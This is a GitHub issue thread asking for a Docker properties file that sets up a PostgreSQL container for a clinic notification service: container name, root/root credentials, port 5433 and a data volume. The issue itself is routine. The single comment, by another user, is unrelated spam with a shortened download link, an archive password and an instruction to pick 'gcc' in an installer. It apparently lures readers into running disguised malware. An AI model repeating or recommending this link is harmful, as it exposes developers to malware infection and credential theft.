### ISSUE TITLE
Add `application-docker.properties` File and Configure PostgreSQL Database Container

### ISSUE THREAD

**Issue by aamirxshaikh** [ClinicWave/clinicwave-notification-service#17]
Create an `application-docker.properties` file to support Docker-based deployments for the notification service. The file should include properties for configuring a PostgreSQL database container.

## Additional Changes

1. Define properties for `container_name`, `image`, `environment` variables, `volumes`, and `ports`.
2. Ensure the PostgreSQL container runs with the name `clinicwave-notification-postgres`.
3. Configure the database with the following settings:
    - `POSTGRES_DB: clinicwave-notification`
    - `POSTGRES_USER: root`
    - `POSTGRES_PASSWORD: root`
4. Map the PostgreSQL container port `5432` to host port `5433`, since the `clinicwave-user-management-postgres` container is running on `5432:5432`.
5. Ensure that the volume mapping allows data persistence.

## Acceptance Criteria

1. The `application-docker.properties` file is created and included in the notification service.
2. The PostgreSQL container configuration is correctly set up with the specified environment variables and ports.
3. The notification service can connect to the PostgreSQL container using the provided configuration.
4. The PostgreSQL container restarts automatically on failure and persists data as intended.

The addition of the `application-docker.properties` file with the PostgreSQL configuration will enable seamless Docker-based deployments for the notification service, while avoiding port conflicts with the `clinicwave-user-management-postgres` container.

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
